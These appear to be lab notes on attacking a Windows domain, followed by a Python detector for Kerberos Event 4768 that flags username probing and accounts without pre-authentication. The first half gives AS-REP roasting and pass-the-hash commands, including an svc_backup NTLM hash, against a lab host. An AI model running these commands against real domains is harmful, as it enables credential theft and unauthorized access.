04 Windows Enum & Exploit

ExploitDB

searchsploit -m 48431

User Enum

When you have a list of possible users, use GetNPUsers.py to get the correct user list with the NTLM hash. After that, the commands "pth-winexe" and "evil-winrm" can use the NTLM hash to log in to the Windows system.

python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john

# Method 1
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd

# Method 2
# evil-winrm takes the user with -u (-U is the URL option) and only the NT hash with -H
evil-winrm -u svc_backup -H b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192
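
On the domain controller, the GetNPUsers.py step above appears as Kerberos TGT requests (Security Event ID 4768). The following Python is an added example, not part of the original notes: it triages 4768 records for a source probing many unknown names and for TGTs issued without pre-authentication. The sample users, addresses and the threshold are constructed assumptions.

```python
from collections import defaultdict

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN: the name does not exist
SUCCESS = "0x0"
RC4_HMAC = "0x17"          # RC4-HMAC ticket encryption type

def ev(user, src, status, preauth, etype):
    """Build one record using Event ID 4768 field names."""
    return {"TargetUserName": user, "IpAddress": src, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample data: made-up users, RFC 5737 documentation addresses.
SAMPLE_4768 = [
    ev("bob", "192.0.2.10", SUCCESS, "2", "0x12"),                   # normal logon
    ev("bbo", "192.0.2.11", UNKNOWN_PRINCIPAL, "-", "0xffffffff"),   # single typo
    ev("alice", "192.0.2.50", UNKNOWN_PRINCIPAL, "-", "0xffffffff"),
    ev("guest1", "192.0.2.50", UNKNOWN_PRINCIPAL, "-", "0xffffffff"),
    ev("Test", "192.0.2.50", UNKNOWN_PRINCIPAL, "-", "0xffffffff"),
    ev("svc_test", "192.0.2.50", SUCCESS, "0", RC4_HMAC),            # TGT, no pre-auth
]

def triage(events, enum_threshold=3):
    """Return (enum_sources, no_preauth_hits) from 4768 records.

    enum_sources: source IP -> distinct unknown names it asked for, kept only
                  when the count reaches enum_threshold (user-list probing).
    no_preauth_hits: successful TGTs with PreAuthType 0, i.e. the account has
                  "Do not require Kerberos preauthentication" set.
    """
    unknown_by_src = defaultdict(set)
    hits = []
    for e in events:
        if e["Status"] == UNKNOWN_PRINCIPAL:
            unknown_by_src[e["IpAddress"]].add(e["TargetUserName"].lower())
        elif e["Status"] == SUCCESS and e["PreAuthType"] == "0":
            hits.append({"user": e["TargetUserName"], "src": e["IpAddress"],
                         "rc4": e["TicketEncryptionType"] == RC4_HMAC})
    enum_sources = {src: sorted(names) for src, names in unknown_by_src.items()
                    if len(names) >= enum_threshold}
    for h in hits:
        # A no-pre-auth TGT requested by a host that also probed names is the
        # high-priority case; the fix is to clear the flag on that account.
        h["from_enum_source"] = h["src"] in enum_sources
    return enum_sources, hits

if __name__ == "__main__":
    print(triage(SAMPLE_4768))
```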
